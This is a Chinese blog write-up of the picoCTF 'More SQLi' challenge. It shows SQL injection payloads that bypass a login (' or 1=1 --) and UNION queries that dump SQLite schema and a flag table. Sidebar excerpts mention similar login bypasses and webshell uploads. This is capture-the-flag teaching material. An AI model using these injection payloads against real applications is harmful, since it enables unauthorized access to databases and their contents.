picoCTF-Web Exploitation-More SQLi

最新推荐文章于 2024-07-18 17:57:21 发布
最新推荐文章于 2024-07-18 17:57:21 发布
阅读量441 收藏 3
点赞数 7
分类专栏: CTF 文章标签: 网络安全 威胁分析 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huckers/article/details/138755186
版权

Description

Can you find the flag on this website.

Additional details will be available after launching your challenge
instance.

Hints

SQLiLite

先随便输入个账号密码登录一下,得到查询SQL,接下来应该对SQL进行某些攻击来绕过密码登录成功

-- username: admin
-- password: 123
SQL query: SELECT id FROM users WHERE password = '123' AND username = 'admin'

password 条件在 username 前,我们只能先搞定password了

使用' or 1=1 -- 建如下sql,试一下

-- username: admin(随便什么都行)
-- password: ' or 1=1 --
SELECT id FROM users WHERE password = '' or 1=1 --' AND username = 'admin'

登录得到如下界面

在这里插入图片描述

填入信息search一下发现这里大概的sql语句为

SELECT name, address, phone FROM table_name WHERE name = '';

提示使用的SQLite数据库,在 SQLite 中有个 sqlite_master 表,用来存储数据库表的一些信息,我们构建一个sql,用来展示都有哪些表及字段

' UNION SELECT name, sql, 1 FROM sqlite_master; --

SELECT name, address, phone FROM table_name WHERE name = '' UNION SELECT name, sql, 1 FROM sqlite_master;--';

在这里插入图片描述

得到上图信息,发现more_table中有个flag字段,我们构建一个sql来查询,得到flag

' UNION SELECT 0, flag, 1 FROM more_table; --

SELECT name, address, phone FROM table_name WHERE name = '' UNION SELECT 0, flag, 1 FROM more_table; -- ';

在这里插入图片描述

huckers
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
picoCTF2018 Writeup之Web Exploitation
zwish的信安之路
09-16 1717
My New Website 打开发现是个登录界面,随便输入账号密码登陆成功,然后发现cookie里面有个admin字段为false,改为True(一定要大写) 得到flag:picoCTF{l0g1ns_ar3nt_r34l_92020990} Irish Name Repo 没有任何过滤的注入,直接到/admin登录页面,使用万能密码admin' or '1'='1登录即可 my r...
picoCTF,Web Exploitation,网页开发类,39/45
Allezima阿力代码
02-10 2547
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF-Web Exploitation-Most Cookies
huckers的博客
05-11 441
该网站上要指出的另一件事是有一个“验签”部分。由于Flask Cookie 涉及加密,因此设置了一个。将得到签名后的token替换到网页cookie→session中,刷新页面得到flag。使用flask-unsign及cookie_names转换的wordlist解签找到。安装flask-unsign(我是windows,cmd环境,请注意引号相关)wordlist.txt(放到cmd运行目录即可,我的是。这里的逻辑表示,本站使用Python的Flask框架。进行签名,使用我们解密出的secret。
picoCTF-Web Exploitation-Trickster
huckers的博客
05-12 523
连接木马地址,以前用菜刀,管理webshell,爬取网站文件信息挺好用的,百度找到一个中国蚁剑就决定试试,看介绍好像也是根据菜刀改的。这应该是个上传漏洞了,十几年没用过了,不知道思路是不是一样的,以前的思路是通过上传漏洞想办法上传一个木马,拿到webshell,今天试试看能不能成功。随便制作一个png图片(直接截图保存),越小越好,便于我们查看修改文件信息,上传png图片。,(这里后缀的验证是前端js做的,用Burpsuite发送请求就不必考虑后缀的验证问题了)扩展名,然后还要验证文件字节的正确性。
picoCTF-Web Exploitation-Web Gauntlet
huckers的博客
05-12 536
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
picoCTF-Web Exploitation-Java Code Analysis!?!
huckers的博客
05-13 1847
code?
android-kernel-exploitation:Android内核开发
03-19
Android内核开发 客观的 本次研讨会的目的是开始在Android平台上进行内核...git clone https://github.com/cloudfuzz/android-kernel-exploitation ~ /workshop Github页面URL 车间流 作者 阿什法克安萨里( 的) 。
vmware-exploitation:与VMware转义漏洞相关的链接的集合
05-12
VMware开发与VMware转义漏洞相关的链接的集合。 拉请求是受欢迎的。研究2020年 [文章] [幻灯片] [文章] 撰写的 [文章]2019年“ ESXi的大逃亡”(36C3)[] [ ] 撰写的 [文章] 撰写的 [文章] [纸] 2018年Zisis ...
heap-exploitation.pdf
02-01
heap-exploitation.pdf
Windows-10-Exploitation
03-21
Windows-10-Exploitation
PICOCTF_2019:picoCTF2019解决方案
02-18
【标签】:“binary-exploitation write-up picoctf-2019 C” 这些标签揭示了压缩包中的主要内容和技术方向。"binary-exploitation"表明了解题过程中涉及了二进制漏洞利用,这是CTF比赛中常见的一类挑战,通常需要...
picoCTF2020_Web
煤矿路口西的博客
11-11 718
picoCTF Web Exploitation Insp3ct0r Insp3ct0r How do you inspect web code on a browser?There’s 3 parts ctrl+u看源码->1/3 of the flag: picoCTF{tru3_d3 mycss.css看源码-> 2/3 of the flag: t3ct1ve_0r_ju5t myjs.js看源码->3/3 of the flag: _lucky?2e7b23e3} w.
picoCTF,Forensics,取证类,43/50
Allezima阿力代码
02-10 1503
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoctf_2018_are you root
z1r0的博客
02-11 909
picoctf_2018_are you root 查看保护 红色里面放的是level。level为5时才会get-flag,而设置level最多只有是4。 v6是二级指针。strdup函数,内部会malloc一个与字符串长度一样的堆,并把字符串拷贝进去。 这里会将strdup这个函数创建的堆给free掉。 攻击思路就是:使用login将后面的level给覆盖成5。退出,重新正常登进去即可,让第二次登录时,程序将覆盖掉的level变成真正的level,程序没有对level做出改变,所以level被
CTF-Web Exploitation(持续更新)
huckers的博客
05-09 1044
根据提示使用不同的请求方式得到response可能会得到结果使用抓包工具Burp Suit抓取链接请求信息修改请求方式POST/GET为HEAD发送请求,获取包含flag的响应信息TheHEADGETHEAD方法请求与GET请求相同的响应,但没有响应正文。Burp Suite是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。本题中使用。
mysql中more语句,MySQL常用语句(一)
weixin_32668987的博客
03-17 145
关于Show语句show语句可以用来查询数据库,表,列和服务器状态信息,show后面还可以跟like操作符,甚至有的还可以跟where语句show variables 查看系统变量show variables 显示MySQL系统变量的值1234567891011121314mysql> show variables like "%char%";+-----------------------...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
YARA:第十四章-基于JSON文件的威胁分析
最新发布
qq_29490749的博客
07-18 890
YARA是一个用于恶意软件检测和分析的工具,它的作用主要包括以下几个方面:(1)恶意软件检测:YARA最核心的功能是检测恶意软件。用户可以编写规则来识别特定的恶意软件特征,如字符串、代码序列、数据结构等。(2)自动化威胁识别:通过预定义的规则,YARA可以自动化地识别和分类潜在的威胁,减少人工分析的需求。(3)文件分析:YARA可以扫描文件内容,识别出文件中可能包含的恶意代码或数据。(4)内存分析:YARA不仅可以分析文件,还可以分析内存中的进程,帮助检测运行中的恶意软件。
深入理解Offensive Security Web Exploitation 2:渗透测试与Web应用攻击
《Offensive Security Web Exploitation 2》是一本实践性和理论性结合的网络安全渗透测试书籍,由作者Joas Antonio撰写,专注于Web应用程序的安全攻防。这本书主要针对对Web应用基础知识有一定了解的读者,因为它并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值